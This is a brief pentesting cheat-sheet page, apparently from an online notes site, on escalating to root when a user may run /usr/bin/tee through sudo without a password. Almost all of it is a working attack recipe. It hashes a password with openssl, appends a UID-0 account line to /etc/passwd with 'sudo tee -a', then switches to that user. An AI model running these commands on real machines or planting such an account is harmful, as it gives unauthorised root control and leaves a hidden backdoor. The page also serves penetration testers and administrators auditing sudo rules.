Sudo Tee Privilege Escalation
Sudo tee command is vulnerable to privilege escalation.
(root) NOPASSWD: /usr/bin/tee
Copied!If we can execute tee command as root, we can escalate to privilege.
Assume the new username is "tester".
# -1: MD5 algorithm
# -salt: Use privided salt -> The new username here
openssl passwd -1 -salt "tester" "password123"
# Output: $1$tester$LvsygQ2GEt7VUJQEqhMLf/
Copied!Copy the output password.
Paste the password in printf and overwrite /etc/passwd using tee command.
printf 'tester:$1$tester$LvsygQ2GEt7VUJQEqhMLf/:0:0:root:/root:/bin/bash\n' | sudo tee -a /etc/passwd
Copied!Now the new user was created. We can switch to the new user.
su tester
password: password123Last updated